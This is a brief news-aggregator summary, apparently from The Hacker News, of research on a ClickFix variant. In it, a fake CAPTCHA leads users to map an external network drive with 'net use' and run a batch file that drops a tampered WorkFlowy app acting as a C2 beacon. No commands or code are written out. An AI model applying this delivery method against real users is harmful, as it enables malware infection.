"Atos Researchers identified a new variant of the popular ClickFix technique, where attackers convince the user to execute a malicious command on their own device through the Win + R shortcut. In this variation, a "net use" command is used to map a network drive from an external server, after which a ".cmd" batch file hosted on that drive is executed."
"Script downloads a ZIP archive, unpacks it, and executes the legitimate WorkFlowy application with modified, malicious logic hidden inside ".asar" archive. This acts as a C2 beacon and a dropper for the final malware payload."
"Typically, at this stage, attackers have used PowerShell or mshta to download and execute the next stage of the malware. Here, instead, we can see that "net use" is being used to map and connect to a network drive of an external server from which a Batch script is executed."
A new ClickFix attack variant has been identified that uses a fake CAPTCHA webpage to trick users into executing commands via Win+R. The attack employs net use commands to map an external network drive, then executes a batch file from that drive. This batch file downloads and unpacks a ZIP archive containing a legitimate WorkFlowy application with malicious logic embedded in an .asar archive. The modified application functions as a command and control beacon and dropper for final malware payloads. This represents a departure from typical ClickFix attacks that previously relied on PowerShell or mshta for payload delivery.
#clickfix-attack #malware-delivery #command-and-control #social-engineering #network-drive-exploitation
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]